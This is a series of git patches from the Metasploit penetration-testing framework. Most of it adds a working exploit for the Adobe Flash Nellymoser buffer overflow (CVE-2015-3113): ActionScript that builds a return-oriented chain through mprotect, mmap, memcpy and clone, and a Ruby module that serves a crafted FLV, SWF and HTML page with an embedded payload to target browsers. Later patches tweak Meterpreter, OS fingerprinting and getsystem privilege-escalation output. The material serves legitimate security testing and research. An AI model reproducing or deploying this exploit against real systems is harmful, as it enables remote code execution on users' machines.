+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/Logger.as b/external/source/exploits/CVE-2015-3113/Logger.as
new file mode 100755
index 0000000000..3f3ddd9785
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str)
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str)
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3113/PE.as b/external/source/exploits/CVE-2015-3113/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3113/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
new file mode 100644
index 0000000000..9c7d34a4c5
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
+      'Description'         => %q{
+        This module exploits a buffer overflow happening when handling nellymoser encoded audio
+        inside a FLV video, as exploited in the wild on June 2015. This module has been tested
+        successfully on:
+
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, and
+        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-3113'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
+          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
+          ['URL', 'http://bobao.360.cn/learning/detail/357.html']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'Jun 23 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    @flv = create_flv
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    if request.uri =~ /\.flv$/
+      print_status('Sending FLV...')
+      send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+  def create_flv
+    header = ''
+    header << 'FLV' # signature
+    header << [1].pack('C') # version
+    header << [4].pack('C') # Flags: TypeFlagsAudio
+    header << [9].pack('N') # DataOffset
+
+    data = ''
+    data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
+    data << "\xee" * 0x440 # SoundData
+
+    tag1 = ''
+    tag1 << [8].pack('C')  # TagType (audio)
+    tag1 << "\x00\x04\x41" # DataSize
+    tag1 << "\x00\x00\x1a" # TimeStamp
+    tag1 << [0].pack('C')  # TimeStampExtended
+    tag1 << "\x00\x00\x00" # StreamID, always 0
+    tag1 << data
+
+    body = ''
+    body << [0].pack('N') # PreviousTagSize
+    body << tag1
+    body << [0xeeeeeeee].pack('N') # PreviousTagSize
+
+    flv = ''
+    flv << header
+    flv << body
+
+    flv
+  end
+end

From ee118aa89d94ddb93654bc5d7b05bfbcbbdf9e03 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 1 Jul 2015 13:30:22 -0500
Subject: [PATCH 0615/1013] Fix description

---
 .../exploits/multi/browser/adobe_flash_nellymoser_bof.rb    | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
index 9c7d34a4c5..6670cf2351 100644
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'                => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
       'Description'         => %q{
-        This module exploits a buffer overflow happening when handling nellymoser encoded audio
-        inside a FLV video, as exploited in the wild on June 2015. This module has been tested
-        successfully on:
+        This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
+        encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
+        has been tested successfully on:
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,

From b1b21c4bef9d51448110d84f4340fff6d20f8175 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 1 Jul 2015 14:32:12 -0400
Subject: [PATCH 0616/1013] Pymet fixes for Python 3.x

---
 data/meterpreter/meterpreter.py | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 9fdf586fdc..30aa8dba1b 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -48,10 +48,10 @@ if sys.version_info[0] < 3:
 else:
 	if isinstance(__builtins__, dict):
 		is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
-		str = lambda x: __builtins__['str'](x, 'UTF-8')
+		str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
 	else:
 		is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
-		str = lambda x: __builtins__.str(x, 'UTF-8')
+		str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
 	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
 	NULL_BYTE = bytes('\x00', 'UTF-8')
 	long = int
@@ -286,15 +286,17 @@ def tlv_pack(*args):
 		tlv = {'type':args[0], 'value':args[1]}
 	else:
 		tlv = args[0]
-	data = ""
+	data = ''
+	value = tlv['value']
 	if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
-		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+		if isinstance(value, float):
+			value = int(round(value))
+		data = struct.pack('>III', 12, tlv['type'], value)
 	elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
-		data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
+		data = struct.pack('>IIQ', 16, tlv['type'], value)
 	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
+		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
 	else:
-		value = tlv['value']
 		if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
 			value = value.encode('UTF-8')
 		elif not is_bytes(value):
@@ -644,7 +646,6 @@ class TcpTransport(Transport):
 		if not address in ('', '0.0.0.0', '::'):
 			address, port = sock.getpeername()[:2]
 		url += address + ':' + str(port)
-		url = url
 		return cls(url, sock)
 
 class PythonMeterpreter(object):

From cd688437ac302be0a10b18fa0350d1ec9a794a3f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 1 Jul 2015 15:02:22 -0500
Subject: [PATCH 0617/1013] Add support for Windows 10 for os.js

Resolves #4248
---
 data/js/detect/os.js | 1 +
 1 file changed, 1 insertion(+)

diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index b1ad75db2b..ddd582d6ec 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -338,6 +338,7 @@ os_detect.getVersion = function(){
 				case "Windows NT 6.1": os_name = "Windows 7"; break;
 				case "Windows NT 6.2": os_name = "Windows 8"; break;
 				case "Windows NT 6.3": os_name = "Windows 8.1"; break;
+				case "Windows NT 10.0": os_name = "Windows 10"; break;
 			}
 		}
 		if (version.match(/Linux/)) {

From e7271e3c04bb1800c053af3238f16275e889480e Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 1 Jul 2015 16:04:54 -0500
Subject: [PATCH 0618/1013] Call the Meterpreter methods directly vs pollute
 the namespace

---
 lib/msf/core/handler/reverse_http.rb | 12 +++---------
 1 file changed, 3 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 9102039e86..ac7cd83d32 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -2,7 +2,7 @@
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
 require 'rex/payloads/meterpreter/uri_checksum'
-require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter'
 require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 
@@ -19,7 +19,6 @@ module ReverseHttp
   include Msf::Handler
   include Rex::Payloads::Meterpreter::UriChecksum
   include Msf::Payload::Windows::VerifySsl
-  include Rex::Post::Meterpreter
 
   #
   # Returns the string representation of the handler type
@@ -258,15 +257,10 @@ protected
         # Handle the case where stageless payloads call in on the same URI when they
         # first connect. From there, we tell them to callback on a connect URI that
         # was generated on the fly. This means we form a new session for each.
-        sum = uri_checksum_lookup(:connect)
-        new_uri = generate_uri_uuid(sum, uuid) + '/'
 
-        # This bit is going to need to be validated by the Ruby/MSF masters as I
-        # am not sure that this is the best way to get a TLV packet out from this
-        # handler.
         # Hurl a TLV back at the caller, and ignore the response
-        pkt = Packet.new(PACKET_TYPE_RESPONSE, 'core_patch_url')
-        pkt.add_tlv(TLV_TYPE_TRANS_URL, new_uri)
+        pkt = Rex::Post::Meterpreter::Packet.new(PACKET_TYPE_RESPONSE, 'core_patch_url')
+        pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/")
         resp.body = pkt.to_r
 
       when :init_python

From a5ad56754feb5f237deed46172c42743dfc04a4a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 2 Jul 2015 08:03:39 +1000
Subject: [PATCH 0619/1013] Use full namespace for PACKET_TYPE_RESPONSE

---
 lib/msf/core/handler/reverse_http.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index ac7cd83d32..b0bf70d9e5 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -259,7 +259,8 @@ protected
         # was generated on the fly. This means we form a new session for each.
 
         # Hurl a TLV back at the caller, and ignore the response
-        pkt = Rex::Post::Meterpreter::Packet.new(PACKET_TYPE_RESPONSE, 'core_patch_url')
+        pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE,
+                                                 'core_patch_url')
         pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/")
         resp.body = pkt.to_r
 

From 482247771d951a941892e280dd9250de43b7fdcf Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 1 Jul 2015 18:06:25 -0500
Subject: [PATCH 0620/1013] Add a fingerprint for Windows 10 + IE11

---
 data/js/detect/os.js | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index ddd582d6ec..a93197e53b 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -338,7 +338,6 @@ os_detect.getVersion = function(){
 				case "Windows NT 6.1": os_name = "Windows 7"; break;
 				case "Windows NT 6.2": os_name = "Windows 8"; break;
 				case "Windows NT 6.3": os_name = "Windows 8.1"; break;
-				case "Windows NT 10.0": os_name = "Windows 10"; break;
 			}
 		}
 		if (version.match(/Linux/)) {
@@ -974,6 +973,12 @@ os_detect.getVersion = function(){
 				os_name = "Windows 8";
 				os_sp = "SP0";
 				break;
+			case "1100":
+				// IE 11.0.10011.0 Windows 10.0 (Build 10074) English - insider preview
+				ua_version = "11.0";
+				os_name = "Windows 10";
+				os_sp = "SP0";
+				break;
 			default:
 				unknown_fingerprint = version;
 				break;

From 93c74efb978fac40e2d76bce964234b9a1e02ed9 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 1 Jul 2015 18:43:22 -0500
Subject: [PATCH 0621/1013] Add Ubuntu as a tested target

---
 modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
index 6670cf2351..123a3bdf3b 100644
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -22,6 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
         Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466.
+        Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From 3b9ba189f772ab149663dae9e4483278fd260356 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 1 Jul 2015 19:56:35 -0500
Subject: [PATCH 0622/1013] Add CVE-2015-3043 information

---
 modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
index 123a3bdf3b..9f7824d750 100644
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -32,7 +32,9 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'          =>
         [
+          ['CVE', '2015-3043'],
           ['CVE', '2015-3113'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
           ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
           ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
           ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
@@ -67,8 +69,9 @@ class Metasploit3 < Msf::Exploit::Remote
             case target.name
             when 'Windows'
               return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
+              return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
             when 'Linux'
-              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466')
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
             end
 
             false

From caddf545c48a7293f8ba9ed47f24d4b31129c34f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 1 Jul 2015 20:49:14 -0500
Subject: [PATCH 0623/1013] Make getsystem more verbose

Resolves #4401
---
 .../command_dispatcher/priv/elevate.rb        | 63 ++++++++++++++-----
 1 file changed, 49 insertions(+), 14 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index 19c606f42f..2ed17dc21c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -17,17 +17,20 @@ class Console::CommandDispatcher::Priv::Elevate
 
   include Console::CommandDispatcher
 
-  ELEVATE_TECHNIQUE_NONE					= -1
-  ELEVATE_TECHNIQUE_ANY					= 0
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
-  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
+  ELEVATE_TECHNIQUE_NONE               = -1
+  ELEVATE_TECHNIQUE_ANY                = 0
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE  = 1
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
+  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP   = 3
+
+  ELEVATE_TECHNIQUE_DESCRIPTION =
+    [
+      "All techniques available",
+      "Service - Named Pipe Impersonation (In Memory/Admin)",
+      "Service - Named Pipe Impersonation (Dropper/Admin)",
+      "Service - Token Duplication (In Memory/Admin)"
+    ]
 
-  ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available",
-                    "Service - Named Pipe Impersonation (In Memory/Admin)",
-                    "Service - Named Pipe Impersonation (Dropper/Admin)",
-                    "Service - Token Duplication (In Memory/Admin)"
-                  ]
   #
   # List of supported commands.
   #
@@ -45,6 +48,26 @@ class Console::CommandDispatcher::Priv::Elevate
   end
 
 
+  #
+  # Returns the description of the technique(s)
+  #
+  def translate_technique_index(index)
+    translation = ''
+    desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
+    desc.each {|e| e.gsub!(/^Service - /, '')}
+
+    case index
+    when 0
+      desc.shift
+      translation = desc
+    else
+      translation = [ ELEVATE_TECHNIQUE_DESCRIPTION[index] ]
+    end
+
+    translation
+  end
+
+
   #
   # Attempt to elevate the meterpreter to that of local system.
   #
@@ -73,17 +96,29 @@ class Console::CommandDispatcher::Priv::Elevate
     }
 
     if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
-      print_error( "Technique '#{technique}' is out of range." );
+      print_error( "Technique '#{technique}' is out of range." )
       return false;
     end
 
-    result = client.priv.getsystem( technique )
+    begin
+      result = client.priv.getsystem( technique )
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("#{e.message} The following was attempted:")
+      translate_technique_index(technique).each do |desc|
+        print_error(desc)
+      end
+      elog("#{e.class} #{e.message} (Technique: #{technique})\n#{e.backtrace * "\n"}")
+      return
+    end
 
     # got system?
     if result[0]
-      print_line( "...got system (via technique #{result[1]})." );
+      print_line( "...got system via technique #{result[1]} (#{translate_technique_index(result[1]).first})." )
     else
-      print_line( "...failed to get system." );
+      print_line( "...failed to get system while attempting the following:" )
+      translate_technique_index(technique).each do |desc|
+        print_error(desc)
+      end
     end
 
     return result

From a17b27efce7df9f634a3c36c15a6059a43b87d3e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 1 Jul 2015 21:47:51 -0500
Subject: [PATCH 0624/1013] Update descriptions

---
 .../ui/console/command_dispatcher/priv/elevate.rb        | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index 2ed17dc21c..18172d0416 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -26,9 +26,9 @@ class Console::CommandDispatcher::Priv::Elevate
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
       "All techniques available",
-      "Service - Named Pipe Impersonation (In Memory/Admin)",
-      "Service - Named Pipe Impersonation (Dropper/Admin)",
-      "Service - Token Duplication (In Memory/Admin)"
+      "Named Pipe Impersonation (In Memory/Admin)",
+      "Named Pipe Impersonation (Dropper/Admin)",
+      "Token Duplication (In Memory/Admin)"
     ]
 
   #
@@ -53,11 +53,10 @@ class Console::CommandDispatcher::Priv::Elevate
   #
   def translate_technique_index(index)
     translation = ''
-    desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
-    desc.each {|e| e.gsub!(/^Service - /, '')}
 
     case index
     when 0
+      desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
       desc.shift
       translation = desc
     else

